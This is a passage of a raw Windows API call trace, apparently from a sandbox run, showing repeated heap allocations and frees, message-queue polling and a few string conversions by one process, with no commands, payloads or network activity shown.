lpOverlapped=0x0 | out: lpBuffer=0x8fecd8*, lpNumberOfBytesWritten=0x87f43c*=0x6d, lpOverlapped=0x0) returned 1 [0197.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0197.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0197.597] CloseHandle (hObject=0x158) returned 1 [0197.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0197.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0197.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0197.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0197.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0197.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0197.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0197.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0197.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907340 | out: hHeap=0x8a0000) returned 1 [0197.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0197.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0197.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0197.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0197.599] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0197.599] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0197.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0197.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0197.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0197.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0197.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c08b0 | out: hHeap=0x8a0000) returned 1 [0197.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0197.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0197.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0197.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0197.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0197.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0197.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0197.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0197.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0197.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0197.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0197.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0197.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0197.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0197.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0197.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0197.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0197.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0197.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0197.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0197.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0197.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0197.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0197.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0197.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0197.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0197.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0197.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0197.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0197.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0197.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0197.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0197.600] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0197.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0197.600] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0197.600] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0197.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0197.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0197.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0197.601] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0197.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0197.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0197.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0197.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b30 [0197.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0197.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0197.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0197.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0197.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0197.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0197.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0197.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd378 [0197.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0197.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0197.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0197.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0197.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0197.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0197.602] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0197.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0197.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0197.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0197.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0197.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0197.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0197.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0197.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0197.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0197.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0197.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0197.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0197.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0197.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0197.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0197.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0197.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0197.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0197.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0197.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0197.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0197.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0197.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0197.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0197.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0197.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0197.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0197.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0197.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0197.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0197.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0197.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0197.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0197.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0197.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0197.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0197.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0197.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0197.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0197.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0197.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0197.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0197.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0197.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0197.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0197.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0197.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0197.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0197.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0197.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0197.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0197.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0197.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0197.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0197.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0197.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0197.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0197.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0197.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0197.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0197.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0197.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0197.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0197.605] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0197.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0197.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0197.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0197.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0197.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0197.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0197.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0197.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0197.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0197.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0197.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0197.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0197.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0197.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0197.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0197.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0197.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0197.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0197.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0197.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0197.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0197.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0197.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0197.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0197.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0197.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0197.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0197.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0197.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0197.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0197.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0197.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0197.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0197.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0197.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0197.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0197.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0197.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0197.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0197.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0197.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0197.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0197.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0197.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0197.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0197.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0197.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0197.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0197.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0197.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0197.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0197.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0197.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0197.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0197.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0197.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0197.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0197.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0197.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0197.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0197.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0197.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0197.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0197.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0197.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0197.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0197.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0197.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0197.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0197.608] HeapFree (in: hHeap=0x8a0000, 